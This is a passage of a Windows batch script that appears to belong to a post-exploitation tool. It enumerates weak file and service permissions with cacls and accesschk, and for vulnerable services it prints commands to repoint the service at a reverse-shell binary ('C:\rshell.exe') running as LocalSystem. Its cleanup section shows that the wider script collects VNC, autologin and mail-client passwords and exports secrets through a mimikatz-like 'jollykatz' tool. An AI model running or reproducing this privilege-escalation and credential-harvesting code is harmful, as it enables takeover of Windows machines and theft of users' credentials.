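REM @echo off & 2>nul (>>"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" echo off) && (echo RW access) || (echo no RW access) & echo on

REM cacls prints one ACE per line as ACCOUNT:rights, with the file path on the
REM first line before the first ACE. The old filter matched any W or F on the
REM line, which also hit letters in the path itself, e.g. "Program Files".
REM Anchoring the rights letter, W, F or C, at the end of the line after the
REM account name avoids that; it assumes cacls prints the letter last.
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I /R "Users:.*[WFC]$") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I /R "Everyone:.*[WFC]$") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)

echo.Files and folder with Read-Write access
echo.---------------------------------------
REM dir /s finds accesschk.exe anywhere below the current directory, but it
REM is invoked by bare name afterwards, so it must be here or on the PATH.
dir accesschk.exe /a/s/b >NUL 2>&1
IF ERRORLEVEL 1 (
	echo === NOTE: accesschk.exe not found, skipping accesschk file permissions checks ===
	goto:eof
)

	REM Accept the Sysinternals EULA once, silently, so the real runs never block on a prompt.
	accesschk.exe /accepteula >NUL 2>&1

	accesschk.exe -uwqs "Everyone" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
	accesschk.exe -uwqs "Users" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
	accesschk.exe -uwqs "Authenticated Users" c:\*.*  | findstr /VI \.*System.Volume.Information*. | findstr /VI \.*Documents.And.Settings*.

	echo.Searching for weak service permissions
	echo.--------------------------------------
	accesschk.exe -uwcqv "Authenticated Users" * | Find "RW " 1> NUL
	if %ERRORLEVEL% == 0 (
		echo.**** !!! VULNERABLE SERVICES FOUND - Authenticated Users!!! ****
		accesschk.exe -uwcqv "Authenticated Users" *
		echo.****************************************************************
		echo.
	)
	accesschk.exe -uwcqv "Users" * | Find "RW " 1> NUL
	if %ERRORLEVEL% == 0 (
		echo.**** !!! VULNERABLE SERVICES FOUND - All Users !!! ****
		accesschk.exe -uwcqv "Users" *
		echo.*******************************************************
		echo.To plant binary in service use:
		echo.sc config [service_name] binpath= "C:\rshell.exe"
		echo.sc config [service_name] obj= ".\LocalSystem" password= ""
		echo.sc qc [service_name] ^(to verify!^)
		echo.net start [service_name]
		echo.*******************************************************
	)
	accesschk.exe -uwcqv "Everyone" * | Find "RW " 1> NUL
	if %ERRORLEVEL% == 0 (
		echo.**** !!! VULNERABLE SERVICES FOUND - Everyone !!! ****
		accesschk.exe -uwcqv "Everyone" *
		echo.*******************************************************
		echo.To plant binary in service use:
		echo.sc config [service_name] binpath= "C:\rshell.exe"
		echo.sc config [service_name] obj= ".\LocalSystem" password= ""
		echo.sc qc [service_name] ^(to verify!^)
		echo.net start [service_name]
		echo.*******************************************************
	)
goto:eof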
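:cleanup
REM Clear every flag and scratch variable the script set, so nothing leaks
REM into the calling shell, and remove the scratch files. Missing from the
REM previous list: DREAMWEAVERfound, GMAILDESKTOPfound, IDMfound, PICASAfound
REM and vers.
REM Kept on purpose because they ARE the output: registrydump.txt and
REM anything the jollykatz /export commands wrote into the current directory.
REM Those contain secrets; collect them and delete them by hand.
if exist serviceexes.txt del serviceexes.txt
if exist dirlisting.txt del dirlisting.txt
if exist systeminfo.txt del systeminfo.txt
if exist "%TEMP%\osname.txt" del "%TEMP%\osname.txt"
set jollykatz=
set accesschk=
set OSbit=
set whoami=
set runningelevatedprompt=
set netshfirewall=
set OSVersion=
set vers=
set alwaysinstallelevated=
set realvncpassfound=
set tightvncpassfound1=
set tightvncpassfound2=
set tigervncpassfound=
set vnc3passfound1=
set vnc3passfound2=
set vnc3passfound3=
set winautologinpassfound=
set winautologindomainfound=
set winautologinuserfound=
set defaultloginpass=
set IE6found=
set IE7found=
set AIM6found=
set AIMPROfound=
set BEYLUXEfound=
set BIGANTfound=
set CAMFROGfound=
set GOOGLETALKfound=
set IMVUfound=
set NIMBUZZfound=
set PALTALKfound=
set YAHOOPAGERfound=
set INCREDIMAILfound=
set OUTLOOK2013found=
set OUTLOOK2010POSTNTfound=
set OUTLOOK2010PRENTfound=
set OUTLOOK98MAILONLYfound=
set OUTLOOK98NORMALfound=
set DREAMWEAVERfound=
set GMAILDESKTOPfound=
set IDMfound=
set PICASAfound=
goto:eof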
:end
REM Closing banner; the goto:eof that follows ends the script.
echo.
echo.==============
echo.Dump complete!
echo.==============
goto:eof